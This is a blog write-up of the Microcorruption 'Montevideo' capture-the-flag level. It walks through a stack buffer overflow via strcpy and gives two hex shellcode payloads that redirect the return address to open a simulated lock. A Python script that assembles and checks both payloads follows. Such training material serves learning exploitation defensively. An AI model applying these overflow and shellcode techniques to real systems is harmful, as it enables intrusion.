Monday, November 10, 2014

Microcorruption - Montevideo


Again, login ends with the same strange `add #0x10, sp` before its `ret`. As before, this lets us overflow the buffer and plant a return address of our choosing. If this were a software version the address to plant would be that of “unlock door”, but since this is a hardware version we again have to get 0xff00 into SR (interrupt 0x7f in the high byte with bit 15 set, which is exactly what the INT helper produces) and call 0x10 <_trap_interrupt> to open the lock. Pretty much the same as before, so let's try the same code.

Of course it doesn't work, and looking at the code we can see they have added strcpy into the mix: it copies bytes up to and including the first null terminator, and stops there. So our password may contain only one 00 byte, and it has to be the last one.

But other than that our methodology should be intact; we just have to adjust the code. We can still have the filler up front, then the redirect to our code as before, but we have to be a little more creative to work around the 00 bytes that our shell code would otherwise contain.

Ideas:

So we have some filler, the address of our shell code, another bit of filler and then the code itself:

3f40 fffe   mov #0xfeff, r15   ← the immediate is stored little-endian (bytes ff fe = 0xfeff); loading 0xff00 directly would encode as 00 ff and contain a null
1f53        inc r15            ← r15 is now 0xff00: interrupt 0x7f in the high byte with bit 15 set
024f        mov r15, sr        ← move it into the status register
b012 1000   call #0x10         ← has to be the last thing: its final 00 byte is the string terminator

So putting it together we have the following parts:

41414242434344444545464647474848   filler (16 bytes, fills the buffer)
0244                               return address pointing at our shell code (0x4402, little-endian)
4141                               filler
3f40fffe1f53024fb0121000           injected shell code

41414242434344444545464647474848024441413f40fffe1f53024fb0121000

Wow, that's a really long password. Perhaps we can think of something shorter?

So rather than injecting the shell code after the return address, why not make the shell code the password itself? The overwritten return address then sends the program counter (instruction pointer) back to the start of our shell code. Of course we still have to watch out for null bytes, which means we can't use `call #0x10` inside the code (its encoding b012 1000 contains one), but the provided code already performs that call for us at address 0x455c. All we have to do is call there instead.

So, instead of starting the password with filler (4141, "AA"), let's start with the injected code and put the filler after it. We also change the call target to 0x455c, an address within the provided code that does the `call #0x10` for us. The last word is the address at which the beginning of the password is stored, which becomes the new return address. Here's an entry that works and is much shorter.

3f40fffe1f53024fb0125c45 41414141 ee43

3f40fffe1f53024fb0125c45   shell code (12 bytes)
41414141                   filler (4 bytes) to reach the saved return address
ee43                       return address = start of the shell code (0x43ee, little-endian)
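To make the byte-level reasoning behind both payloads checkable, here is an added example (not code from the original post): a minimal encoder for the four MSP430 instruction forms the shell code uses, a builder that assembles both payloads above, and a model of what strcpy would actually copy. The buffer address 0x43ee is taken from the last word of the short payload, the 16-byte buffer size is inferred from the 16-byte filler, and 0x455c is assumed, as the post says, to be the `call #0x10` inside the level's INT helper; the SR layout (interrupt number in the high byte, bit 15 set) is what that helper builds with `swpb` and `bis #0x8000, sr`.

```python
"""Added example for the Montevideo write-up: encode the MSP430 instructions
the shell code uses, assemble both payloads, and check the strcpy constraint
(no 0x00 byte anywhere except as the very last byte).  Addresses are taken
from the post's own payloads: buffer at 0x43ee (assumed 16 bytes), INT's
`call #0x10` at 0x455c."""
import struct

R15, SR = 15, 2          # MSP430 register numbers; the status register is r2


def mov_imm(imm, rdst):
    """mov #imm, Rdst: opcode 0x4030|rdst, then the immediate, little-endian."""
    return struct.pack("<HH", 0x4030 | rdst, imm & 0xFFFF)


def mov_reg(rsrc, rdst):
    """mov Rsrc, Rdst (register-to-register): 0x4000 | rsrc<<8 | rdst."""
    return struct.pack("<H", 0x4000 | (rsrc << 8) | rdst)


def inc(rdst):
    """inc Rdst is add #1, Rdst via the constant generator: 0x5310 | rdst."""
    return struct.pack("<H", 0x5310 | rdst)


def call_imm(addr):
    """call #addr: opcode 0x12b0, then the target address, little-endian."""
    return struct.pack("<HH", 0x12B0, addr & 0xFFFF)


def sr_for_interrupt(n):
    """SR value the INT helper ends up with: interrupt number in the high
    byte, bit 15 set (swpb r15; mov r15, sr; bis #0x8000, sr).  0x7f -> 0xff00."""
    return ((n << 8) | 0x8000) & 0xFFFF


def strcpy_copies(memory):
    """Bytes strcpy lands in the destination: everything up to and including
    the first 0x00 of the source.  getsn leaves zeroed memory after the typed
    input, so a payload with no null at all is terminated by that."""
    end = memory.find(b"\x00")
    return memory if end < 0 else memory[: end + 1]


def survives_strcpy(payload):
    """True if no byte before the last one is 0x00: strcpy then copies the
    whole payload (a final 00 is simply the terminator)."""
    return b"\x00" not in payload[:-1]


def null_free_increment_source(target):
    """Pick imm so that `inc` turns imm into target and imm has no zero byte.
    For target 0xff00 this is 0xfeff (bytes ff fe in the instruction stream)."""
    imm = (target - 1) & 0xFFFF
    if b"\x00" in struct.pack("<H", imm):
        raise ValueError("imm %#06x still contains a null byte" % imm)
    return imm


def shellcode(call_target):
    """mov #0xfeff, r15 / inc r15 / mov r15, sr / call #call_target."""
    imm = null_free_increment_source(sr_for_interrupt(0x7F))      # 0xfeff
    return mov_imm(imm, R15) + inc(R15) + mov_reg(R15, SR) + call_imm(call_target)


def payload_after_return(buf_addr=0x43EE, buf_len=16):
    """First layout: 16 bytes of filler, the saved return address, 2 bytes of
    padding, then shell code that calls #0x10 directly (its trailing 00 is the
    terminator).  The return address is computed from the stack layout:
    buffer + 16 is the return slot, and the code sits 4 bytes past it."""
    filler = bytes.fromhex("41414242434344444545464647474848")   # constructed
    ret_slot = buf_addr + buf_len             # where `ret` reads its address
    code_addr = ret_slot + 2 + 2              # after the return word and "AA"
    return filler + struct.pack("<H", code_addr) + b"AA" + shellcode(0x10)


def payload_in_buffer(buf_addr=0x43EE, buf_len=16, int_call=0x455C):
    """Second layout: shell code first, filler up to the return-address slot,
    then the buffer's own address as the return address.  Calling the level's
    existing `call #0x10` keeps the payload free of null bytes entirely."""
    code = shellcode(int_call)
    filler = b"A" * (buf_len - len(code))
    return code + filler + struct.pack("<H", buf_addr)


if __name__ == "__main__":
    print("long :", payload_after_return().hex())
    print("short:", payload_in_buffer().hex())
    naive = mov_imm(sr_for_interrupt(0x7F), R15)      # 3f40 00ff: null inside
    print("naive mov #0xff00 survives strcpy:", survives_strcpy(naive))
```

Running the script prints the two hex strings from the post; the naive `mov #0xff00, r15` (bytes 3f40 00ff) is rejected by `survives_strcpy`, and `strcpy_copies` shows why: only `3f 40 00` would reach the stack buffer.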
